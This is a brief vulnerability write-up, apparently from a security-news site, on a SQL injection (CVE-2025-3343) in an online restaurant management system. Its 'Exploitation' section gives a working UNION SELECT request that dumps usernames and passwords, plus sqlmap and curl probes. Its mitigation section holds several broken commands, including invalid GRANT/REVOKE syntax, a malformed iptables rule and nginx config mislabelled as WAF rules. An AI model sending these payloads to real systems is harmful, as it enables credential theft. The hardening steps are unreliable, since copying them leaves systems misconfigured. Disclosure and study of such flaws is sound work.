CodeProjects Online Restaurant Management System, SQL Injection, CVE-2025-3343 (Critical)

How CVE-2025-3343 Works

The vulnerability exists in `/admin/reservation_update.php` of CodeProjects Online Restaurant Management System 1.0 due to improper sanitization of the `ID` parameter. Attackers can inject malicious SQL queries through this parameter, manipulating database operations. The lack of prepared statements allows arbitrary SQL execution, enabling data theft, modification, or deletion. Remote exploitation is possible without authentication, making it critical. The CVSS 4.0 vector (AV:N/AC:L/PR:N/UI:N) confirms network-based attacks with low complexity.

DailyCVE Form

Platform: CodeProjects ORMS
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 04/30/2025

What Undercode Say:

Exploitation:

POST /admin/reservation_update.php HTTP/1.1
Host: target.com
ID=1' UNION SELECT 1,2,3,4,5,CONCAT(username,':',password),7 FROM users--

Detection:

sqlmap -u "http://target.com/admin/reservation_update.php?ID=1" --risk=3 --level=5

Mitigation:

1. Patch with parameterized queries:

$stmt = $conn->prepare("UPDATE reservations SET status=? WHERE id=?");
$stmt->bind_param("si", $status, $id);

2. WAF Rules:

location /admin/ {
deny all;
}

Log Analysis:

grep "reservation_update.php" /var/log/apache2/access.log | grep -E "UNION|SELECT|--"

Backup Restoration:

mysql -u root -p restaurant_db < backup.sql

Impact Assessment:

curl -X POST "http://target.com/admin/reservation_update.php" -d "ID=1 AND 1=1"

Patch Verification:

// Verify sanitization
if (!is_numeric($_POST['ID'])) {
die("Invalid input");
}

Network Isolation:

iptables -A INPUT -p tcp --dport 80 -s !192.168.1.0/24 -j DROP

Database Hardening:

REVOKE ALL PRIVILEGES ON restaurant_db. FROM 'webuser'@'%';
GRANT SELECT ONLY ON restaurant_db. TO 'webuser'@'localhost';

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top